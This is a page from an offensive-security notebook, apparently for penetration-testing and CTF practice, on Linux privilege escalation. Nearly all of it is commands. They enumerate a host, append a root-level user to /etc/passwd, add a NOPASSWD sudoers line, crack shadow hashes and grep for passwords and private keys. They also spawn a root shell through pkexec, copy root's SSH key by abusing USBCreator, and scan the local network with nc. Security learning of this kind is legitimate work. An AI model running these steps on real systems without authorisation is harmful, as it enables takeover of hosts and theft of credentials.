🔮
P4n1cBook
  • 🏴‍☠️Welcome!
    • 🔮P4n1cBook
    • 📚Bookmarks
    • 🚨Licence and Disclaimer
  • Fundamentals
    • Starter Kit
      • Linux
      • PowerShell
      • Git
      • 💾Regex
      • Network Analysis
        • curl
        • tcpdump
        • Nmap
        • 🦈Wireshark
      • Metasploit
    • 🌐Network Protocols
      • ICMP
      • SSH
      • Telnet
      • DNS
      • FTP
      • HTTP/HTTPS
      • SMB
      • SNMP
      • SMTP
      • NFS
      • IPP
      • WinRM
      • LLMNR
      • JDWP
    • Code
      • Python Essentials
      • C & C++
    • Web APIs
      • GraphQL
    • Shells/TTYs
    • Dorks
    • Cryptography
    • Reverse Engineering
      • GDB
      • Binaries
  • Web Exploitation
    • Web Enumeration
      • User Endpoints
      • Web Fuzzing
        • ffuf
        • feroxbuster
        • Gobuster
        • GoWitness
      • Web Servers
        • Apache
        • Nginx
        • Werkzeug
      • Databases
        • MySQL
        • NoSQL
          • MongoDB
          • Redis
      • Web Services/Frameworks
        • Wordpress
        • Laravel
        • Express
        • Magento
        • AIOHTTP
        • HashiCorp Vault
        • Tiny File Manager
        • Joomla
        • CMS Made Simple
        • 🌵Cacti
        • Tomcat
        • Zabbix
        • OpenNetAdmin
        • ImageMagick
    • Vulnerabilities
      • Arbitrary File Read
      • Session Hijacking
      • SSRF
      • Eval Injection
      • Template Manipulation
      • Path Traversal
      • Prototype Pollution
      • XXE
      • Deserialization
      • Log Poisoning
      • Arbitrary Command Execution
      • SQLi
        • SQLmap
      • SSI
      • SSTI
      • LFI
      • XSS
    • Java-based web application
      • Struts
      • .WAR
      • pd4ml.jar
  • Cloud Exploitation
    • Kubernetes
    • AWS
  • Post Exploitation
    • File Transfer
      • Exfiltration
    • Credential Dumping
      • Thunderbird
    • Lateral Movement
    • Persistence
    • Linux Privilege Escalation
      • Static Binaries
      • Enumeration
      • Hijacks
      • Command Injection
      • Jailbreaks
      • Binary Exploitation - Linux
      • Kernel Exploits
      • Buffer Overflow - Linux
      • Docker
      • Abusing Wildcards
  • Wireless Exploitation
    • NFC
Powered by GitBook
On this page
Edit on GitHub
  1. Post Exploitation
  2. Linux Privilege Escalation

Enumeration

PreviousStatic BinariesNextHijacks

Last updated 9 days ago

Basic
Host Info
uname -a
Check Environment
env
Check user permissions
sudo -l
Check hostname
hostname -I
Check the internal network
ifconfig
User with shells
grep "sh$" /etc/passwd
Check Ownership by group
find / -group management 2>/dev/null
Check processes
ps auxww
Check mounted devices
mount
Container processes 
ps auxww | grep docker
ps auxww | grep lxd
Read crontab file
cat /etc/crontab
Check Services running
ls /etc/init.d
Check System info
uname -a
Check groups file
cat /etc/group

adm group can read log files.

cat /var/log
Show listening ports
netstat -tuln
netstat -tnl
Listen to the localhost
netstat -an -p tcp
Check binaries with capabilities
getcap -r / 2>/dev/null
SUID/SETGID binaries
find / -perm -4000 -or -perm -2000 2>/dev/null
Traces library function calls
ltrace ProgramName
Search Kernel for Exploits
searchsploit "Linux Kernel" | grep <version>
/etc/passwd

Write Permissions

Generate the password hash
openssl passwd -1 tokyo
Add the line 
echo 'tokyo:$1$iLayOiAd$8dHGiU.Qvk/uqjnoWzRpm/:0:0:tokyo:/root:/bin/bash' >> passwd
/etc/shadow
Create the Hash file
echo 'zoe:$y$j9T$Ct0y5TNQ/sv95CFPz510O/$7YtCDOBISfngZeQ3rsDkRcw2XTFDgHBkxDpuhyBLNO1:1002:1002:zoe:/home/zoe:/bin/bash' > shadowHash.txt
Crack the hash
john --wordlist=~/Documents/Wordlists/rockyou.txt shadow.txt --format=crypt
/etc/sudoers
Try to read it
cat /etc/sudoers

  • If the file is read-only, you need to change its permissions to allow write access:

chmod +w /etc/sudoers

  • Add the following line:

yourUser   ALL=(ALL) NOPASSWD: ALL

  • Restore the original file permissions to make it read-only again:

chmod 440 /mnt/etc/sudoers
Scan the local network

  • Find one many hosts there are in the network by doing a ping sweep:

for i in {1..254}; do (ping -c 1 192.168.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

  • If nc is installed can be use to scan for open ports:

nc -zv 192.168.0.1 1-65535 2>&1 | grep -v refused | tee scan
UDP scan
nc -uzv 192.168.0.1 1-65535 2>&1 | grep -v refused
Credential Hunting

Passwords

  • Search for the string pass (case-insensitive) in all files and directories recursively:

grep -iR "pass" * 2>/dev/null

  • Search for the string password in files with double extension, recursively:

grep password .*.* -r 2>/dev/null

  • Search for ssh keys recursively from the current directory you are in:

grep -iR -E "(ssh-(rsa|ed25519|dss|ecdsa|rsa1)[ ]+[A-Za-z0-9+/=]+|-----BEGIN [A-Z ]+PRIVATE KEY-----)" * 2>/dev/null

Hashes

MD5 hashes
grep -aPo '[a-fA-F0-9]{32}' /DESIRED/PATH
SHA-1
grep -aPo '[a-fA-F0-9]{40}' /DESIRED/PATH
SHA-256
grep -aPo '[a-fA-F0-9]{64}' /DESIRED/PATH
SHA-512
grep -aPo '[a-fA-F0-9]{128}' /DESIRED/PATH
Polkit
Check policy
cat /etc/polkit-1/localauthority.conf.d
Become root
pkexec "/bin/sh"
USBCreator

  • Allows to over write files with sudo permissions:

Copy root private key
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true

Nmap Binary
LogoChecklist - Linux Privilege Escalation - HackTricks